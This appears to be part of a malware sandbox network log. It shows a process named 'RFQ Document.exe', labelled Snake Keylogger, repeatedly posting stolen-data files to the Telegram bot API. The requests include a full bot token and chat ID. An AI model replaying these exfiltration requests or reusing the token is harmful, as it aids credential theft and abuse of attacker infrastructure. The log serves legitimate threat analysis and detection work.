2021-09-28 06:00:04 UTC	518	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:04 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:04 UTC	518	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12911,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808804,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
328	192.168.2.4	50165	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:04 UTC	519	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fb3e8a7b Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:04 UTC	519	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 33 65 38 61 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fb3e8a7bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:05 UTC	519	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:04 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:05 UTC	520	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12912,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808804,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
329	192.168.2.4	50166	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:05 UTC	520	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fb5b2567 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:05 UTC	521	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 35 62 32 35 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fb5b2567Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:05 UTC	521	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:05 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:05 UTC	521	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12913,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808805,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.4	49807	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:27 UTC	52	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c5d02817 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:27 UTC	52	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 64 30 32 38 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c5d02817Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:27 UTC	53	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:27 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:27 UTC	53	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12613,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808707,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
330	192.168.2.4	50167	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:05 UTC	522	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fb77c217 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:05 UTC	522	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 37 37 63 32 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fb77c217Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:05 UTC	523	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:05 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:05 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12914,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808805,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
331	192.168.2.4	50168	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:05 UTC	524	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fb8f9955 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:05 UTC	524	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 38 66 39 39 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fb8f9955Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:05 UTC	524	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:05 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:05 UTC	525	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12915,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808805,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
332	192.168.2.4	50169	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:05 UTC	525	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fbac356b Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:05 UTC	526	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 61 63 33 35 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fbac356bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:05 UTC	526	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:05 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:05 UTC	526	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12916,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808805,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
333	192.168.2.4	50170	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:05 UTC	527	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fbc66f63 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:05 UTC	527	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 63 36 36 66 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fbc66f63Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:05 UTC	528	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:05 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:05 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 35 2c 22 64 Data Ascii: 